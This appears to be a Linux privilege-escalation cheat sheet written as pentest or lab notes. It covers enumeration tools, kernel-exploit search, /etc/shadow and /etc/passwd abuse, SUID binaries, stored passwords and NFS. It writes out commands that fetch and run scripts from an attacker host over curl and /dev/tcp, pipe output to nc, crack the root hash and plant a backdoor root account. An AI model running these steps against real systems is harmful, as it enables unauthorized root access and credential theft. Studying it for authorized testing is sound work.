Linux Privesc

Introduction

1. Use the "id" and "whoami" commands to check your user account.

2. Execute Linux Smart Enumeration (lse.sh) with progressively increasing levels to gather more detailed information about the system.

3. Run LinEnum and other relevant scripts to identify potential vulnerabilities and security-related issues that may lead to privilege escalation.

Take the time to carefully review the results of your enumeration. If Linux Smart Enumeration at level 0 or 1 identifies something noteworthy, make a note of it. To avoid getting sidetracked, make a checklist of the prerequisites needed for the privilege escalation method to work.

Check for files in the user's home directory and other common locations, such as "/var/backup" or "/var/logs". If the user has a history file, read it as it may contain valuable information like commands or passwords.

Start with simpler methods that require fewer steps, such as Sudo, Cron Jobs, and SUID files. Examine root processes, determine their versions, and search for potential exploits. Look for internal ports that can be forwarded to your attack machine.

If you still haven't obtained root access, go back and review the full enumeration results again, and highlight anything that appears unusual, such as unfamiliar process or file names, non-standard filesystems (anything other than ext, swap, or tmpfs on Linux), or unusual usernames. At this point, you can also begin exploring the possibility of kernel exploits.

Tools

Linux Smart Enumeration

Download from here.

Linux Smart Enumeration has several levels that progressively disclose more detailed information.

wget http://<kali_ip>:<port>/lse.sh #Download it from Kali
chmod +x lse.sh
./lse.sh -i -C | grep yes
./lse.sh -s <SELECTION> -l <LEVEL_0-2>

  -l LEVEL     Output verbosity level
                 0: Show highly important results. (default)
                 1: Show interesting results.
                 2: Show all gathered information.
  -s SELECTION Comma separated list of sections or tests to run. Available
               sections:
                 usr: User related tests.
                 sud: Sudo related tests.
                 fst: File system related tests.
                 sys: System related tests.
                 sec: Security measures related tests.
                 ret: Recurren tasks (cron, timers) related tests.
                 net: Network related tests.
                 srv: Services related tests.
                 pro: Processes related tests.
                 sof: Software related tests.
                 ctn: Container (docker, lxc) related tests.
                 cve: CVE related tests.
               Specific tests can be used with their IDs (i.e.: usr020,sud)

LinEnum

Download from here.

LinEnum is a powerful Bash script that can extract a wealth of valuable information from a target system. The tool can also copy important files for export and search for files that contain specific keywords, such as "password".

LinPEAS

Downlaod from here.

Run LinPEAS saving colors:

./linpeas.sh | tee -a linpeas.out

# Upload the file to Kali
systemctl stop ssh.socket
scp /tmp/linpeas.out kali@<kali_ip>:/home/kali/Offensive/PGs/

# Local network
sudo python -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim

# Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim

# Excute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim

# Output to file
./linpeas.sh -a > ./linpeas.out #Victim
less -r /dev/shm/linpeas.txt #Read with colors

# Use a linpeas binary
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64

Kernel Exploits

Locating and utilizing kernel exploits is typically a straightforward process:

• Perform enumeration to identify the kernel version (using a command such as "uname -a").

• Search for relevant exploits that match the kernel version on search engines like Google, ExploitDB, or GitHub.

• Compile and execute the exploit, but exercise caution as kernel exploits can be unstable, single-use only, and may cause system crashes.

1. Enumerate the kernel version:

uname -a
    Linux debian 2.6.32-5-amd64 1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux

1. Use searchsploit to find matching exploits:

searchsploit linux kernel 2.6.32 priv esc

1. We can try and adjust our search to be less specific with the kernel version, but more specific with the distribution:

searchsploit linux kernel 2.6 priv esc debian

1. Install Linux Exploit Suggester 2 (https://github.com/jondonas/linux-exploit- suggester-2) and run the tool against the original kernel version:

./linux-exploit-suggester-2.pl –k 2.6.32

Service Exploits

To display all processes that are currently running with root privileges, use the following command:

ps aux | grep "^root"

With any results, try to identify the version number of the program being executed.

Running the program with the --version/-v command line option often shows the version number:

<program> --version
<program> -v

On Debian-like distributions, dpkg can show installed programs and their version:

dpkg -l | grep <program>

On systems that use rpm, the following achieves the same:

rpm –qa | grep <program>

Port Forwarding

In certain cases, a root process may be linked to an internal port for communication purposes. If, for any reason, you cannot run an exploit on the target machine itself, you can forward the port to your local machine using SSH:

ssh -R <local-port>:127.0.0.1:<target-port> <username>@<local-machine>

The exploit code can now be run on your local machine at whichever port you chose.

Weak File Permissions

Find all writable files in /etc:

find /etc -maxdepth 1 -writable -type f

Find all readable files in /etc:

find /etc -maxdepth 1 -readable -type f

Find all directories which can be written to:

find / -executable -writable -type d 2> /dev/null

World Readable /etc/shadow

1. Check the permissions of the /etc/shadow file and note that it is world readable:

ls -l /etc/shadow
    -rw-r—rw- 1 root shadow 810 May 13 2017 /etc/shadow

1. Extract the root user’s password hash:

head -n 1 /etc/shadow
    root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXv
    RDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::

1. Save the password hash in a file (e.g. hash.txt):

echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash.txt'

1. Crack the password hash using john:

john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

1. Use the su command to switch to the root user, entering the password we cracked when prompted:

su
Password:
root@debian:/# id
uid=0(root) gid=0(root) groups=0(root)

World Writable /etc/shadow

1. Check the permissions of the /etc/shadow file and note that it is world writable:

ls -l /etc/shadow
    -rw-r—rw- 1 root shadow 810 May 13 2017 /etc/shadow

1. Copy / save the contents of /etc/shadow so we can restore it later.

2. Generate a new SHA-512 password hash:

mkpasswd -m sha-512 newpassword
    $6$DoH8o2GhA$5A7DHvXfkIQO1Zctb834b.SWIim2NBNys9D9h5wUvYK3IOGdxoOlL9VE
    WwO/okK3vi1IdVaO9.xt4IQMY4OUj/

1. Edit the /etc/shadow and replace the root user’s password hash with the one we generated.

root:$6$DoH8o2GhA$5A7DHvXfkIQO1Zctb834b.SWIim2NBNys9D9h5wUvYK3IOGdxoO
lL9VEWwO/okK3vi1IdVaO9.xt4IQMY4OUj/:17298:0:99999:7:::

1. Use the su command to switch to the root user, entering the new password when prompted:

su
Password:
root@debian:/# id
uid=0(root) gid=0(root) groups=0(root)

World Writable /etc/passwd

The root account in /etc/passwd is usually configured like this:

root:x:0:0:root:/root:/bin/bash

The “x” in the second field instructs Linux to look for the password hash in the /etc/shadow file.

In some versions of Linux, it is possible to simply delete the “x”, which Linux interprets as the user having no password:

root::0:0:root:/root:/bin/bash

1. Check the permissions of the /etc/passwd file and note that it is world writable.:

ls -l /etc/passwd
    -rw-r--rw- 1 root root 951 May 13 2017 /etc/passwd

1. Generate a password hash for the password “password” using openssl:

openssl passwd "password"
    L9yLGxncbOROc

1. Edit the /etc/passwd file and enter the hash in the second field of the root user row:

root:L9yLGxncbOROc:0:0:root:/root:/bin/bash

1. Use the su command to switch to the root user:

su
Password:
# id
uid=0(root) gid=0(root) groups=0(root)

1. Alternatively, append a new row to /etc/passwd to create an alternate root user (e.g. newroot):

newroot:L9yLGxncbOROc:0:0:root:/root:/bin/bash

1. Use the su command to switch to the newroot user:

su newroot
Password:
# id
uid=0(root) gid=0(root) groups=0(root)

SUIDs and GUIDs

We can use find to locate SUID programs and discover which programs are SUID:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Next we can use this source to find exploitable methods of the found binary:

GTFO Bins:

Stored Passwords

View the contents of hidden files in the user’s home directory:

$ cat ~/.*history | less
ls -al
cat .bash_history
ls -al
mysql -h somehost.local -uroot -ppassword123

You can also check for configuration files inside the OS.

NFS

Show the NFS server’s export list:

$ showmount -e <target>

Similar Nmap script:

$ nmap –sV –script=nfs-showmount <target>

Mount an NFS share:

$ mount -o rw,vers=2 <target>:<share> <local_directory>